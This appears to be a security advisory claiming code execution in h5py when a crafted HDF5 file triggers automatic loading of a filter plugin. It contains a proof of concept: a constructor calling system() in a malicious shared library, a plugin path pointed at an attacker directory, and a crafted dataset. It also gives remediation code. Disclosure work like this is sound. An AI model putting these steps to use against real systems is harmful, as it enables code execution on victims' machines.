Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py
Target
- Project: h5py/h5py
- URL: https://github.com/h5py/h5py
- Component: HDF5 filter pipeline / dataset read path
- CWE: CWE-94 (Improper Control of Generation of Code, 'Code Injection')
- Severity: HIGH
Summary
When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (.so/.dll) filter plugin from directories in the plugin search path. h5py exposes APIs (h5py.h5pl) to manipulate this search path but does nothing to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the HDF5_PLUGIN_PATH environment variable or through the h5py.h5pl.append()/prepend() APIs.
Vulnerable Code
File: h5py/h5py/h5z.pyx (lines 102-121)
@with_phil
def register_filter(uintptr_t cls_pointer_address):
    '''(INT cls_pointer_address) => BOOL

    Register a new filter from the memory address of a buffer containing a
    ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

    `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
    library::

        import ctypes
        filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
        filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p
        h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())
    '''
    return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
File: h5py/h5py/h5pl.pyx (lines 20-25)
cpdef append(const char* search_path):
    """(STRING search_path)

    Add a directory to the end of the plugin search path.
    """
    H5PLappend(search_path)
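That this call performs no validation is directly observable from Python: the low-level h5py.h5pl module (which also exposes size() and get()) happily records a nonexistent, attacker-chosen directory in the process-wide search path. A minimal sketch:

```python
import h5py

# h5pl.append() takes bytes and performs no existence, permission,
# or ownership checks on the directory being added.
before = h5py.h5pl.size()
h5py.h5pl.append(b'/nonexistent/attacker/path')

assert h5py.h5pl.size() == before + 1  # path accepted unconditionally
```

Every subsequent read in the same process will consider this directory when resolving an unregistered filter ID.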
File: h5py/h5py/_hl/filters.py (lines 295-299)
When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
elif isinstance(compression, int):
    if not allow_unknown_filter and not h5z.filter_avail(compression):
        raise ValueError("Unknown compression filter number: %s" % compression)
    plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
Automatic Plugin Loading (HDF5 library behavior)
When H5Dread() is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for .so/.dll files, loads them via dlopen(), calls H5PLget_plugin_info() to obtain the filter class, and registers it automatically. This happens transparently inside:
- h5py/h5py/_proxy.templ.pyx, line 120: H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)
- h5py/h5py/_proxy.templ.pyx, line 151: H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)
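The set of directories HDF5 will scan (and dlopen() candidates from) can be enumerated from Python, a sketch using h5py's low-level h5pl bindings. By default the list typically holds a single entry taken from HDF5_PLUGIN_PATH or, failing that, HDF5's compiled-in default (e.g. /usr/local/hdf5/lib/plugin on Unix):

```python
import h5py

# Every directory listed here is a candidate for automatic dlopen()
# the moment H5Dread() encounters an unregistered filter ID.
for i in range(h5py.h5pl.size()):
    print(h5py.h5pl.get(i))
```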
Exploitation
Attack Scenario 1: Crafted HDF5 file + environment manipulation
- An attacker sets HDF5_PLUGIN_PATH to a directory they control (e.g., via .bashrc manipulation, Docker environment, or CI/CD configuration)
- They place a malicious .so file in that directory implementing the H5PLget_plugin_info symbol
- They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
- When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes
Attack Scenario 2: h5pl API abuse in shared environments
In applications where users can influence the plugin path via h5py.h5pl.append() before file loading:
import h5py
# Attacker injects malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')
# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
    data = f['dataset'][:]  # Triggers plugin loading -> RCE
Proof of Concept
import h5py
import numpy as np
import os
# Step 1: Create a malicious shared library (filter plugin)
# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code
# For demonstration, this would be:
# gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
# Where malicious_filter.c contains:
# #include <stdlib.h>
# void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }
# Step 2: Set plugin path
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'
# Step 3: Create HDF5 file with custom filter
CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID
with h5py.File('/tmp/crafted.h5', 'w') as f:
    # Use allow_unknown_filter to bypass availability check during creation
    f.create_dataset(
        'payload',
        data=np.zeros(100),
        compression=CUSTOM_FILTER_ID,
        compression_opts=(0,),
        chunks=(100,),
        allow_unknown_filter=True
    )

# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
    data = f['payload'][:]  # This triggers automatic plugin search and dlopen()
Impact
- Arbitrary code execution in the context of the process reading the HDF5 file
- This is particularly dangerous in:
  - Data science pipelines that process untrusted HDF5 files
  - ML model loading (Keras/TensorFlow models are stored as HDF5)
  - Scientific data sharing workflows
  - Jupyter notebook environments processing external data
- h5py provides no mechanism to disable automatic filter plugin loading
- The allow_unknown_filter=True parameter on dataset creation is designed for this workflow, explicitly supporting the use case
Remediation
- Provide an option to disable automatic filter plugin loading when opening files for reading. HDF5 1.10+ supports H5PLset_loading_state() to disable plugin loading.
- Add a security warning in documentation about the risks of processing untrusted HDF5 files
- Consider defaulting to disabled plugin loading for read-only file access, requiring explicit opt-in
- Validate or restrict plugin paths added via h5pl.append()/prepend()
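Until h5py exposes such a switch, an application can flip it itself through ctypes. This is a best-effort sketch: it assumes libhdf5 is discoverable by name and, crucially, it must target the same HDF5 build h5py is linked against (binary wheels bundle their own copy, so an explicit libpath may be needed):

```python
import ctypes
import ctypes.util

def disable_hdf5_plugin_loading(libpath=None):
    """Best-effort call to H5PLset_loading_state(0), which tells HDF5
    not to load any type of filter plugin. Returns True on success,
    False if libhdf5 (or the symbol) could not be located."""
    libpath = libpath or ctypes.util.find_library('hdf5')
    if libpath is None:
        return False
    try:
        lib = ctypes.CDLL(libpath)
        fn = lib.H5PLset_loading_state
    except (OSError, AttributeError):
        return False
    fn.argtypes = [ctypes.c_uint]
    fn.restype = ctypes.c_int
    # A mask of 0 disables every plugin type; passing H5PL_ALL_PLUGIN
    # (0xFFFF) restores the default behavior.
    return fn(0) >= 0
```

Note that this state is global to the loaded HDF5 library, so it should be set once, early, before any untrusted file is opened.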
References
- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline